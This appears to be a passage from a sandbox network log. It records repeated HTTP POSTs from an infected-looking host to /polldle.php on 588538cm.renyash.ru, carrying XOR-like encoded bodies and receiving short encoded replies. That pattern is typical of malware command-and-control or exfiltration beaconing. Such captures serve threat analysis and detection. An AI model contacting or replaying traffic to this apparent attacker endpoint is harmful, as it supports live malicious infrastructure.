Jan 11, 2025 23:34:24.145536900 CET | 1620 | OUT | Data Raw: 58 5e 51 52 5a 41 5a 5c 54 5d 55 5a 50 54 59 5f 50 50 5a 5a 57 5c 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^QRZAZ\T]UZPTY_PPZZW\PZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .3&D&+812'? ?5/+,((&U.S9$\!#(#X'/\/
Jan 11, 2025 23:34:24.236550093 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:24.436311007 CET | 963 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lqeW4bUunBuAqBElAFJpP%2BJOOvwA2rVp%2FNNn7f7pcFQ0F1av1BruRuDuAf8OwD%2FWXn5ttB%2BSd7WsS0%2BbsgHC%2Fu3sn%2B4dmUNlAZAf4TXHQef7dejYUD10H%2BAJy5hUvwy1JzMMwxIC"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fbd3cbbc457-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1463&rtt_var=852&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=545182&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 1e 26 24 3c 1e 3d 39 0e 06 2d 16 3b 12 2e 21 2f 03 29 08 31 02 20 39 24 5d 25 32 3b 0f 2b 2a 2a 1b 3c 3a 0a 0d 34 58 3e 1c 25 13 23 46 0c 1d 22 12 3e 59 24 56 26 12 0a 59 29 33 0f 00 31 1c 2c 45 28 34 01 51 3e 5c 31 5d 22 3c 21 0d 28 21 29 18 2a 43 21 04 2f 31 23 11 24 2a 2e 51 0f 16 21 54 22 08 33 00 22 3e 3c 06 25 33 3b 5f 3c 34 3c 5b 26 04 0a 14 3c 1d 2e 5e 28 0c 20 56 30 3d 27 12 26 2f 0c 5f 28 39 27 53 28 2b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.&$<=9-;.!/)1 9$]%2;+**<:4X>%#F">Y$V&Y)31,E(4Q>\1]"<!(!)*C!/1#$*.Q!T"3"><%3;_<4<[&<.^( V0='&/_(9'S(+$\#(V?[M0


Session ID | Source IP | Source Port | Destination IP | Destination Port
117 | 192.168.2.4 | 50125 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:23.991456985 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:34:24.349858999 CET | 2504 | OUT | Data Raw: 5d 5d 54 50 5a 42 5a 5f 54 5d 55 5a 50 5f 59 5e 50 55 5a 5a 57 5d 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TPZBZ_T]UZP_Y^PUZZW]PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.U*&$!&$4%_88'+?V%397(]#!'[*%#X'/\/(
Jan 11, 2025 23:34:24.445517063 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:24.683984995 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wV2aMy3KE89R71vOqfoNGOXSn4zz2Vnk1kqX41obpSYL0u%2BfD6W7kRVx6CuUolN5%2FRoFZJ5SFMwv7H8EPXX3G9By23U3USTex2Sy%2BKFeI2b9Mw8zlGdQCLpBOWvTN81o%2FfYtxPaJ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fbe8e8e8cb4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3320&min_rtt=1965&rtt_var=3448&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=113955&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
Jan 11, 2025 23:34:24.772527933 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
118 | 192.168.2.4 | 50126 | 104.21.38.84 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:34:24.903994083 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
Jan 11, 2025 23:34:25.255024910 CET | 2504 | OUT | Data Raw: 5d 59 54 54 5f 45 5a 59 54 5d 55 5a 50 55 59 51 50 56 5a 59 57 51 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTT_EZYT]UZPUYQPVZYWQPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F:U6D%Z$!6%/.#[,]+)?S%:-Z5\+#X'/\/
Jan 11, 2025 23:34:25.375793934 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:34:25.617631912 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cQagGyaV6mrDBVvj3eRDb1IExY1M8xgpVSaQzeCks4T4Cprgl%2BB5E3Fs2%2F%2Bsu%2FkJFj7XIYtv1pL%2BOD8RWJ00iRBeN9rASIFkk%2FKD4XTwpKvaZOY7aaLWVLcbsgXa3vlWVaP3DgM"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fc44ebb41cd-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4486&min_rtt=1763&rtt_var=6107&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=61998&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                119  192.168.2.4  50127  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:25.746139050 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:26.098711967 CET  2504  OUT  Data Raw: 58 5d 51 50 5a 47 5a 58 54 5d 55 5a 50 54 59 5a 50 52 5a 5a 57 53 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]QPZGZXT]UZPTYZPRZZWSPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@. *D&^0$2939S49[;8 +/?1#9("(#X'/\/
                                                                                Jan 11, 2025 23:34:26.209597111 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:26.455501080 CET  810  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yh9Vh%2BqKsvRbmFsQ7JTZP1qV9oAi09prl3y7FVaFDXKXOLBTCCEcpzqG6WofXZJ1OyxYPBIsl8Egx4WmyOaFTJmKo%2FbBtIrp5jZvMjHCOxAeLQKYCjn%2FMx%2F9YJ%2FaA5ZJTvW1Tw%2By"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fc98cf84333-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3465&min_rtt=1671&rtt_var=4214&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=91119&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                120  192.168.2.4  50128  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:26.594919920 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:26.942418098 CET  2504  OUT  Data Raw: 58 5f 54 52 5a 49 5a 5f 54 5d 55 5a 50 59 59 58 50 5d 5a 5f 57 51 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X_TRZIZ_T]UZPYYXP]Z_WQPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 90)1(]&>39 %88$+?,$39-47"T#X(5#X'/\/0
                                                                                Jan 11, 2025 23:34:27.042316914 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:27.280797005 CET  806  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yt4dnyQqXAwkRDquYQFt%2B%2BoD7pLumfGlP0ADgTO%2B8offs%2BUI9hiSHvJ6YRlMAE1JHWi0zvX4qTu9t4W3RSTgnSpxh5522Td3Hr73oBESi3lrbUWEWrvzH7NFs7BoaNj1AP1StueR"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fcecc7d8c69-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4726&min_rtt=2045&rtt_var=6129&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=62140&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                121  192.168.2.4  50129  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:27.494982958 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2496
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:27.848972082 CET  2496  OUT  Data Raw: 58 51 54 57 5a 44 5f 5c 54 5d 55 5a 50 5c 59 58 50 5d 5a 53 57 50 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTWZD_\T]UZP\YXP]ZSWPP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-$8/1!&%?%S /=^,87^?<(1 :-[!!3Y(#X'/\/
                                                                                Jan 11, 2025 23:34:27.939373970 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:28.220211983 CET  806  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTRwtgzaNUN%2FBTOYt3txj%2BK4kulbPNqnPiysjJdGzh5Bv%2FHBcXVGI4K1p6xsbB3SmMeNh%2Fgaonq01U5zF63fyBGxxTMHm8IK770cBOofSyMQrMlc2yKpfEfVnQ4CAkif0Y2qzNmS"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fd45da743ad-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1636&rtt_var=970&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=476345&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                122  192.168.2.4  50130  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:28.358536005 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:28.708201885 CET  2504  OUT  Data Raw: 5d 5c 51 57 5f 45 5f 5f 54 5d 55 5a 50 5b 59 5e 50 50 5a 5d 57 55 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QW_E__T]UZP[Y^PPZ]WUPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.6&8]%2',)V4Z"88?(<7U$3- Z"!/<#X'/\/
                                                                                Jan 11, 2025 23:34:28.824124098 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:29.069459915 CET  807  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:29 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMvcVFenA89GJhZL7p9BHe6uc4T3f%2BjjLLA8onPVJpSPXnHwck32HZqO29ewSHr%2FSiMHj7ZFMO4zxd9mS3IfTWS4A0uQJJZqjKzR72rDzkpCzeD8uSYhg7Mj5L8i%2B3AKDgxb%2FpjC"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fd9dd9d726f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3122&min_rtt=1934&rtt_var=3102&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=127588&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                123  192.168.2.4  50131  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:29.226295948 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                124  192.168.2.4  50132  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:29.448821068 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1596
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:29.801899910 CET  1596  OUT  Data Raw: 58 5e 54 56 5a 48 5a 58 54 5d 55 5a 50 54 59 58 50 54 5a 5f 57 55 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^TVZHZXT]UZPTYXPTZ_WUP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9.E$( [$15_01W "84+#R&:W.B<!?\(#X'/\/
                                                                                Jan 11, 2025 23:34:29.911459923 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:30.094750881 CET  949  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AT1J4lmX9ivX5PSCtME5riBQp8058hM1VTkUPT0BFMh9S7zVL5z9nWEK5T3LpgW14%2BCCtbmOGjBXNyJeFAjuUtH1QiRDUutQz1Zol8pTB0nvHKSeTS6gKKFbDudTFMoeEEnRQUUn"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fe0aa75420d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3630&min_rtt=1792&rtt_var=4348&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1915&delivery_rate=88490&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0a 33 24 38 11 28 2a 34 00 2e 38 3f 5a 2d 57 24 59 3e 21 04 5e 37 39 38 5c 31 1c 2f 0b 2b 03 39 40 2b 04 30 0c 34 3d 2a 54 25 03 23 46 0c 1d 21 05 3f 2c 3f 0f 25 3f 24 10 3c 23 35 02 27 22 0a 44 3e 24 3f 55 3d 04 25 5c 22 3c 04 52 28 32 3d 56 3e 25 25 03 2c 31 38 02 26 00 2e 51 0f 16 22 0f 21 0f 2c 58 20 13 15 15 26 0e 28 00 2b 0a 02 5c 24 2a 01 08 28 20 3a 1d 2a 31 3c 56 26 2e 3c 08 26 11 3e 17 3f 29 02 08 29 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-3$8(*4.8?Z-W$Y>!^798\1/+9@+04=*T%#F!?,?%?$<#5'"D>$?U=%\"<R(2=V>%%,18&.Q"!,X &(+\$*( :*1<V&.<&>?));$\#(V?[M0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                125  192.168.2.4  50133  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:29.572412968 CET  319  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:29.926831961 CET  2504  OUT  Data Raw: 58 58 54 50 5a 43 5a 5e 54 5d 55 5a 50 54 59 5a 50 5d 5a 5f 57 56 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXTPZCZ^T]UZPTYZP]Z_WVPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU . 6C%\2)%/. /5X8+7(Y720&.$^"+5#X'/\/
                                                                                Jan 11, 2025 23:34:30.034450054 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:30.271336079 CET  804  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5O30KN%2FJCGRV7FCrDnENTapUXsHJSCEoeNCjS6N%2BsCooNHAguRW63y7kNIWGmE5xKXDzbgHI3euzIRFP34Jqp8LKIstPN5lbkG0PLDcirx9Q%2BjjqNX1NE3v9UDuiKPAZGZ1pkPS"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fe168b70f43-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7681&min_rtt=1554&rtt_var=12837&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=28870&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                126  192.168.2.4  50134  104.21.38.84  80
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:34:30.431314945 CET  295  OUT  POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
